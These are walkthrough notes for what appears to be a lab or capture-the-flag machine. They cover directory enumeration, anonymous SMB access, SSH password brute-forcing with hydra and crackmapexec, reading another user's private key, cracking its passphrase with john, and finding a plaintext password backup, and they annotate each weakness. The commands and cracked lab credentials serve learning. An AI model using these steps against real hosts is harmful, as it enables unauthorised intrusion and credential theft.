ENUM
bash
- gobuster dir -u http://10.10.108.101/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x md,txt -t 30 -o gobust_root.txt
/development
- dev.txt -> mentions Struts (REST), version 2.5.12; possibly affected by https://www.exploit-db.com/exploits/42627 (not verified)
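- j.txt -> note saying that J has a weak password (both notes sit in a directory served by the web server, readable without authentication)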
SMB
plaintext
- smbclient -U '' //10.10.108.101/Anonymous
- get staff.txt (the Anonymous share accepted a connection with an empty username)
users named in staff.txt:
Jan
Kay
SSH
plaintext
- crackmapexec ssh 10.10.108.101 -u jan -p /usr/share/wordlists/rockyou.txt
OR, the same check with hydra:
- hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.108.101 -t 4 ssh
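[22][ssh] host: 10.10.108.101 login: jan password: armando
-> jan's password is in rockyou.txt; SSH password authentication is enabled and the repeated failed logins were not blocked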
PRIVESC
plaintext
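- cat /home/kay/.ssh/id_rsa -> saved locally as kay_id_rsa (kay's private key is readable by another account; it should be readable by its owner only, mode 600)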
- python /usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa.hash
- john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa.hash
key passphrase found: beeswax (a dictionary word, so the passphrase gave the key little protection)
SSH in as kay (key + passphrase) to get pass.bak
plaintext
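cat /home/kay/pass.bak -> heresareallystrongpasswordthatfollowsthepasswordpolicy$$ (apparently kay's password; its length does not help once it is kept in clear text in a backup file)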